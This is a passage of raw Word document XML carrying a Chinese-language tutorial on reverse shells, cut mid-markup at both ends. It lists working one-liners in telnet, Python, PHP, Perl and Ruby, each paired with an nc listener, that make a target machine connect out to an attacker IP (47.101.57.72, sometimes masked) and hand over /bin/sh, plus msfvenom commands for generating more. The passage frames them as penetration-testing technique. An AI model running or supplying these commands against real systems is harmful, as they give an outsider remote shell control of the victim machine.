          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> /bin/bash </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180408AC" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>方法二</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCD7943" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>攻击机需要开启两个本地监听：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB1E3D1" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">nc </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">lvvp </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097DB919" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">nc </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">lvvp </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3732A469" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>目标机主动连接攻击机：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDA300E" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">telnet </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>47.101.57.72</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2333</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> /bin/bash </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> telnet </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>47.101.57.72</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E39B507" w14:textId="77777777" w:rsidR="000C733D" w:rsidRPr="000202D6" w:rsidRDefault="000C733D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C343E9D" w14:textId="445E3815" w:rsidR="003B68A5" w:rsidRDefault="000202D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个端口是执行命令，另一个窗口是命令回显</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F324BB7" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B8F635B" w14:textId="41DE1549" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法八：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4076E878" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Python </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>脚本反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC108D4" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t>当目标主机上有</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>环境时，我们可以用</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>来反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>在现在一般发行版</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>系统中都会自带，所以使用起来也较为方便，即使没有安装，我们手动安装也很方便。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047C8091" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>攻击机开启本地监听：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375CDC18" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">nc </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">lvvp </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00745F03" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>目标机主动连接攻击机：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6DA4D9" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">python </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.xxx.xxx.72",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ECF499" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6"/>
    <w:p w14:paraId="3BF32125" w14:textId="2AE38D89" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法九：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCC9B80" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t>当目标主机上有</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>环境时，我们可以用</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>来反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D765132" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>攻击机开启本地监听：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F15CC58" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">nc </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">lvvp </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324D3C70" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>目标机主动连接攻击机：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581460E3" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t>php -r '$sock=fsockopen("47.xxx.xxx.72",2333);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF6B35E" w14:textId="36E425E8" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法十：</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Perl </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>脚本反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4C1ACE" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t>当目标主机上有</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>perl</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>环境时，我们可以用</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>perl</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>来反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAD1BD6" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>攻击机开启本地监听：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5211DA20" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">nc </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">lvvp </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E9E15C" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>目标机主动连接攻击机：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547730D5" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">perl </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>e 'use Socket;$i="47.101.57.72";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3668F38F" w14:textId="25447BA2" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法十一：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ruby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07499660" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t>当目标主机上有</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>ruby</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>环境时，我们可以用</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>ruby</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>来反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1A843E" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>攻击机开启本地监听：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D500E2B" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">nc </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">lvvp </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333C8B0C" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>目标机主动连接攻击机：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AF15EA" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">ruby </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">rsocket </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>e 'c=TCPSocket.new("47.xxx.xxx.72","2333");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE88195" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t>或</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C00738" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">ruby </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">rsocket </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>e 'exit if fork;c=TCPSocket.new("47.xxx.xxx.72","2333");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787EA56E" w14:textId="7B811E15" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法十二：</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>生成反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>用的一句话</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD02F9B" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t>强大的</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>框架也为我们提供了生成一句话反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>的工具，即</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>，绝对的实用。当我们不记得前面说的所有反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>的反弹语句时，只要我们有</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>，那么我们随时都可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t> msfvenom -l </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>来查询生成我们所需要的各类命令行一句话，具体使用方法如下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BF2F64" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t>我们直接可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t> msfvenom -l </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>结合关键字过滤（如</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>cmd/unix/reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>），列出我们需要生成</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:lastRenderedPageBreak/>
        <w:t>的各类反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>一句话的</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3189E040" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">msfvenom </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">l payloads </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> grep 'cmd/unix/reverse'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A1D810" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6"/>
    <w:p w14:paraId="473E57C6" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t>如上图所示，</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>支持生成反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>一句话的类型非常丰富，大家可以依据渗透测试对象自行选择使用。比如，我们获取一个</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>的一句话：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBA251D" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">msfvenom </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>p cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>unix</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>reverse_python LHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>=47.</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.72</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> LPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>=2333</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
